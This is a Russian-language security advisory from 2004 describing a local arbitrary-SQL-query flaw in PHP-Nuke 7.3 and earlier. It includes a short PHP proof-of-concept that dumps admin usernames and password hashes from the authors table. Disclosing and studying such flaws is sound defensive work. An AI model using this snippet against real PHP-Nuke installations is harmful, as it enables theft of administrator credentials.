Security Lab

Локальное выполнение произвольных SQL запросов PHP-Nuke базе данных

Дата публикации:02.06.2004
Дата изменения:17.10.2006
Всего просмотров:2811
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: PHP-Nuke 7.3 и более ранние версии

Описание: Уязвимость обнаружена в PHP-Nuke. Локальный пользователь может выполнить произвольные SQL запросы на основной базе данных.

Локальный пользователь может создать PHP код, который заставит 'mainfile.php' выполнить SQL запрос к PHP-Nuke базе данных. Необходимая информация подключения к базе данных представлена сценарием 'config.php' на системе. Пример:

<?php
require_once ("/location_of_victim's_PHPNuke/mainfile.php");
$sql = $db->sql_query("SELECT aid,pwd FROM ".$prefix."_authors");
while($record = $db->sql_fetchrow($sql))
~ echo "Username: $record[aid]\n<br>\nPassword: $record[pwd]\n<br><br>\n";
unset($sql);
?>
Для того, чтобы этот эксплоит работал, локальный пользователь должен сперва создать символьную ссылку, которая ссылается директорию базы данных в PHP-Nuke домашнем каталоге.

URL производителя: http://www.phpnuke.org/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: [Full-Disclosure] Possible bug in PHPNuke and other CMS